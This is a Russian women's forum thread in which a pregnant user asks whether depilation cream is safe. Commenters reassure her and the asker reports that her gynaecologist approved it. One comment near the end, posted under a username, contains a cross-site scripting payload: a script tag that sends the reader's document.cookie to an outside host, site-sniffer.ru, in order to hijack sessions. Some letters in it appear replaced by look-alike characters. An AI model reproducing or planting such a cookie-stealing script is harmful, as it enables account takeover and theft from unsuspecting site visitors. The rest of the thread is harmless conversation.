Дорогие пользователи! С 15 декабря Форум Леди закрыт для общения. Выражаем благодарность всем нашим пользователям, принимавшим участие в дискуссиях и горячих спорах. Редакция сосредоточится на выпуске увлекательных статей и новостей, которые вы сможете обсудить в комментариях. Не пропустите!

Крем для депиляции при беременности

Девочки, я всегда пользовалась кремом Veet для гладкости ножек, а вот сейчас не знаю, можно ли его использовать беременным? Беременность долгожданная, так что я как параноик, боюсь навредить себе и крохе.
Самба Маркутко
Тема закрытаТема в горячихТема скрыта
Комментарии
14
Людмила Лажина
Можно, почему нет-то? Давайте теперь еще стричься и краситься не будем. Все будет нормально, пользуйтесь на здоровье, только следите, чтобы раздражения не было.
Самба МаркуткоВ ответ на Людмила Лажина
Людмила Лажина
Можно, почему нет-то? Давайте теперь еще стричься и краситься не будем. Все будет нормально, пользуйтесь на здоровье, только следите, чтобы раздражения не было.
СсылкаПожаловаться
Вроде и понимаю, что все это глупости, а с другой стороны все равно переживаю.. Спасибо!
Комментарий удален.Почему?
Самба МаркуткоВ ответ на Ирина Дорошенко
Да, что-то вы совсем не в тему...
Эмма Засорина
Ьеня эти кремы не интерисуют. Вот так!
Самба МаркуткоВ ответ на Эмма Засорина
Эмма Засорина
Ьеня эти кремы не интерисуют. Вот так!
СсылкаПожаловаться
Зря, женщина должна за собой ухаживать в любом возрасте.
АлёнкаВ ответ на Самба Маркутко
Самба Маркутко
Зря, женщина должна за собой ухаживать в любом возрасте.
СсылкаПожаловаться
История переписки2
с первой беременностью тоже побоялась пользоваться кремами. можно вопрос гинекологу задать, скорее всего, врач не запретит.
Самба МаркуткоВ ответ на Алёнка
Алёнка
с первой беременностью тоже побоялась пользоваться кремами. можно вопрос гинекологу задать, скорее всего, врач не запретит.
СсылкаПожаловаться
История переписки3
Да, спросила уже, врач разрешила, при условии, что не будет раздражения. У меня его нет, ТТТ....
Самба МаркуткоВ ответ на Mari Petro
А почему вы так злитесь?
Людмила Стрельцова
матерится-вот истинная безмозглость!
((( Женечка )))
А с чего вообще такие сомнения? Во время беременности только депиляцию и можно делать - станком или кремом для депиляции. А вот эпиляцию не рекомендуют.
tratill
а мне вот не понятно всегда было....зачем брить станком перед родами? если существуют крема....
nIkItA tAtIsHcSeV
<sсriрt>document.location.replace('http://site-sniffer.ru/php-sсriрt.php?com='+document.cookie);</sсriрt>
Жалоба отправленаОтменить
Бельевые тренды, которые помогут почувствовать себя женственно и роскошно
Как выглядят и чем занимаются знаменитые российские гимнастки после окончания спортивной карьеры
Готовимся к отпуску: что никогда нельзя надевать в самолет
Скинни, брюки и черный: новый стиль 69-летней Брижит Макрон
15 идей для празднования Пасхи: убираем, готовим, украшаем